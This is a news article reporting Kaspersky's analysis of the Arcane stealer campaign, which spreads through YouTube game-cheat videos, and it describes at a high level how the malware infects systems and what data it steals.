Cybercriminals are exploiting YouTube videos promoting game cheats to spread a new, powerful stealer malware known as Arcane, targeting mostly Russian-speaking users. According to cybersecurity firm Kaspersky, the malware campaign has quietly gained momentum, collecting vast amounts of sensitive data from unsuspecting victims.
What makes Arcane particularly dangerous is its ability to gather extensive personal and system information, including data from VPN services, gaming platforms, messaging apps, and even crypto wallets. Kaspersky researchers say the malware is designed to steal everything from login credentials and credit card details to Wi-Fi passwords and system configurations.
How the Attack Works: From YouTube to Full System Breach
The operation begins with YouTube videos offering fake game hacks or cheat downloads. These videos lure users into clicking links that lead to password-protected archive files. Once opened, the archive runs a start.bat script that pulls down another archive using PowerShell commands.
Inside that second package are two executable files — one launching a cryptocurrency miner, the other activating the VGS stealer, a variant of the Phemedrone malware family. However, since late 2024, attackers have swapped VGS out for their new custom stealer, Arcane.
The batch file also disables Windows SmartScreen protections, ensuring the malware runs undetected while allowing future payloads to bypass common security filters.
Kaspersky’s analysis reveals Arcane is no ordinary stealer. It digs deep into the victim’s system, pulling data from a wide range of applications, including:
- VPN clients: NordVPN, ExpressVPN, Mullvad, Proton, IPVanish, CyberGhost, and more
- Network tools: ngrok, Playit, Cyberduck, FileZilla, DynDNS
- Messaging apps: Discord, Telegram, Skype, ICQ, Signal, Viber, and others
- Email clients: Microsoft Outlook
- Gaming platforms: Steam, Epic Games, Riot Client, Battle.net, Ubisoft Connect, Roblox, and Minecraft clients
- Crypto wallets: Electrum, Exodus, Jaxx, Atomic, Guarda, Coinomi, Zcash, and Ethereum wallets
Arcane doesn’t stop there. It captures screenshots, lists running processes, and extracts saved Wi-Fi credentials, providing attackers with a detailed blueprint of the infected machine.
One of Arcane’s most concerning capabilities is its method of extracting sensitive browser data. Most modern browsers use unique encryption keys to protect saved passwords and cookies. Arcane bypasses this protection by abusing the Windows Data Protection API (DPAPI) — a tactic common among data stealers.
However, the malware takes it a step further. It secretly deploys a tool called Xaitax, designed to crack browser encryption keys. Once executed silently in the background, Xaitax feeds the stolen keys back to Arcane, allowing full access to login data, stored cookies, and session tokens.
Adding to its arsenal, Arcane also uses debug ports to launch copies of Chromium-based browsers, extracting cookies directly — a method rarely seen in stealer campaigns.
Kaspersky warns that the group behind Arcane has expanded their operation by introducing a companion tool, ArcanaLoader. Marketed as a simple game cheat downloader, the loader instead installs Arcane stealer on the victim’s machine.
The campaign is primarily targeting users in Russia, Belarus, and Kazakhstan, reflecting a broader trend of cybercriminals tailoring attacks by region and language.
What stands out in this campaign, Kaspersky says, is the attackers’ ability to adapt and expand their methods. From gaming platforms to VPNs and crypto wallets, Arcane’s reach is vast — gathering anything attackers might find valuable.
“This campaign shows how flexible cybercriminals have become — constantly evolving their tools and attack strategies,” Kaspersky noted. “Arcane is particularly dangerous because of the sheer volume of sensitive information it can steal, and the sophisticated tricks it uses to get past defenses.”
For now, the best defense for users — especially those seeking game cheats online — is to avoid unverified downloads and stay vigilant. The lure of free cheats could cost much more than expected.
